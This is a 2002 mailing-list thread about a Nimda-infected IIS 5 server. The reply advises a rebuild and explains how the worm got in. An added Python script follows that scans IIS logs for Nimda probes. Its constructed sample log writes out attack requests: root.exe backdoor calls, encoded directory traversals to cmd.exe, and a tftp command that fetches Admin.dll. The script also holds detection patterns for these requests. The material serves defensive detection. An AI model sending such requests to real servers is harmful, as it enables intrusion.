Reformat the machine. I'M NOT KIDDING. The recommended way to recover from a Nimda compromise is to reformat and reinstall. Once Nimda has infected IIS, it will most likely have infected your mmc.exe, riched20.dll, and a whole lot of other stuff. Guest is most likely now an administrator of your box. Look at your shared drives - you'll notice they are open with full write to all network users.
You were most likely infected because you did not code-red patch your IIS. Nimda initiated a malformed tftp request and sent the admin.dll file into some dir on your webserver. Then your webserver infected your whole computer. Disconnect it from the network immediately. It is scanning the local network for open shares and spitting out those .eml files like crazy. Sorry, but you're pretty much screwed. If the data is important, pull the hard drive out and put it in another computer that has the latest and greatest in virus protection.

http://www.cert.org/advisories/CA-2001-26.html

-----Original Message-----
From: Gregory J Toland [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, February 27, 2002 6:34 PM
To: NT 2000 Discussions
Cc: Gregory John Toland
Subject: Infected W2K Server

I went on travel this past weekend only to return and find my computer was infected with three types of Nimda viruses. Specifically, they are

1. W32.Nimda.A@mm (dll) virus.
2. W32.Nimda.E@mm (dr) virus.
3. W32.Nimda.A@mm (dr) virus.

42 files were infected. 18 files were in C:\Inetpub\scripts\ and were all named like...

C:\Inetpub\scripts\TFTP860
C:\Inetpub\scripts\TFTP952

I have no idea where these files came from. 18 other files came from C:\WINNT\Temp\ and were all named like...

C:\WINNT\Temp\mep914.tmp.exe
C:\WINNT\Temp\mep916.tmp.exe

Again, I have no idea where these came from. Finally, four files that I would have thought would have been installed in a different directory were...

C:\Admin.dll
C:\httpodbc.dll
D:\Admin.dll
D:\httpodbc.dll

Norton Antivirus could not repair them. They have all been quarantined. What happened? I was going to uninstall IIS5 from the C: drive anyway and install it on the D: drive. Will this fix any potential problems my computer may have down the road? Is this false reporting on Norton's part? Please enlighten me! :)

Gregory J Toland
Sr. Systems Architect
XWare Systems Inc.
1643 South Tenth Street
Arlington, VA 22204
(703) 979-8378 (Office)
(703) 655-5766 (Mobile)
[EMAIL PROTECTED]

------
You are subscribed as [EMAIL PROTECTED]
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe send a blank email to [EMAIL PROTECTED]
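The reply above describes three things the worm did to an unpatched IIS 5 box: it used a backdoor that was already there, it walked out of the web root to cmd.exe, and it pulled Admin.dll onto the drive roots over tftp. Each of those leaves a line in the web server's own log, which the poster can still read even though the box has to be rebuilt. The script below is an added example, not code from this thread or from any tool mentioned in it. It scans IIS W3C-extended log lines for the Nimda request patterns (the root.exe copy of cmd.exe that Code Red II left in /scripts and /MSADC, the percent-encoded ../ traversals to winnt\system32\cmd.exe, and the tftp ... GET Admin.dll command) and reports which hosts sent them. The log excerpt is constructed; the field layout follows the IIS 5 W3C format and the request strings follow the probe list in the CERT advisory the reply links to. The decoding routine only approximates how unpatched IIS decoded those paths (overlong UTF-8 accepted, percent-decoding applied twice); it is not a reproduction of the server's code.

```python
"""Scan IIS 5 W3C-extended log lines for the requests Nimda sent to a web server.

Added example, not code from the mailing-list thread.  The log excerpt below is
constructed; the request strings follow the probe list in CERT CA-2001-26.
"""
import re
from urllib.parse import unquote

# Constructed IIS 5 log excerpt: one normal client (192.0.2.10) and one
# infected peer (192.0.2.77) running the Nimda probe sequence against us.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-02-23 14:07:11
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-02-23 14:07:11 192.0.2.10 GET /default.htm - 200
2002-02-23 14:07:12 192.0.2.77 GET /scripts/root.exe /c+dir 200
2002-02-23 14:07:12 192.0.2.77 GET /MSADC/root.exe /c+dir 404
2002-02-23 14:07:13 192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2002-02-23 14:07:13 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2002-02-23 14:07:13 192.0.2.77 GET /_vti_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe /c+dir 200
2002-02-23 14:07:14 192.0.2.77 GET /scripts/root.exe /c+tftp%20-i%20192.0.2.77%20GET%20Admin.dll%20c:\Admin.dll 200
2002-02-23 14:07:20 192.0.2.10 GET /images/logo.gif - 200
"""

# root.exe under /scripts or /MSADC is the copy of cmd.exe that Code Red II
# left behind; Nimda tried it first because it needs no exploit at all.
ROOT_EXE = re.compile(r"^/(scripts|msadc)/root\.exe$")


def iis_decode(path: str) -> str:
    r"""Approximate the lenient decoding unpatched IIS applied to a request path.

    Two behaviours matter for Nimda's probes (this is an approximation, not
    the server's real code):
      * overlong two-byte UTF-8 (%c0%af, %c1%9c, %c0%2f, %c1%1c) was accepted
        as the ASCII byte it encodes, so '..%c0%af..' became '../..';
      * percent-decoding was applied twice, so '..%255c..' became '..' + '\' + '..'.
    The result is lowercased with backslashes folded to '/' for matching.
    """
    def overlong(m: re.Match) -> str:
        lead, cont = int(m.group(1), 16), int(m.group(2), 16)
        code = ((lead & 0x1F) << 6) | (cont & 0x3F)
        return chr(code) if code < 0x80 else m.group(0)

    s = re.sub(r"%(c[01])%([0-9a-f]{2})", overlong, path, flags=re.I)
    s = unquote(unquote(s))
    return s.replace("\\", "/").lower()


def classify(stem: str, query: str) -> list[str]:
    """Return the Nimda indicators present in one request (empty if none)."""
    path = iis_decode(stem)
    q = iis_decode(query) if query not in ("", "-") else ""
    findings = []
    if ROOT_EXE.search(path):
        findings.append("root.exe backdoor (left behind by Code Red II)")
    if path.endswith("/winnt/system32/cmd.exe"):
        via = " via ../ traversal" if "/../" in path else ""
        findings.append("cmd.exe reached through the web server" + via)
    if "tftp" in q and "admin.dll" in q:
        findings.append("tftp fetch of Admin.dll")
    return findings


def scan_log(text: str) -> list[dict]:
    """Parse W3C-extended lines using the #Fields: header and return the hits."""
    fields: list[str] = []
    hits = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()  # IIS encodes spaces in URIs, so whitespace splits fields
        if len(parts) != len(fields):
            continue  # malformed or truncated line: skip rather than guess
        rec = dict(zip(fields, parts))
        findings = classify(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-"))
        if findings:
            hits.append({
                "ip": rec.get("c-ip"),
                "status": rec.get("sc-status"),
                "request": rec.get("cs-uri-stem", "") + " " + rec.get("cs-uri-query", "-"),
                "findings": findings,
            })
    return hits


def attacker_ips(hits: list[dict]) -> set[str]:
    """Source addresses of the probes; each one is itself an infected machine."""
    return {h["ip"] for h in hits}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["request"])
        for f in h["findings"]:
            print("   ->", f)
    print("infected peers:", sorted(attacker_ips(hits)))
```

A 404 on /MSADC/root.exe still counts: the probe was sent even though that copy of the backdoor was not there, and the sequence as a whole is what identifies the worm. The addresses returned by attacker_ips are the other infected machines on the network, which is the list to hand to whoever owns them before the rebuilt box goes back on the wire.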
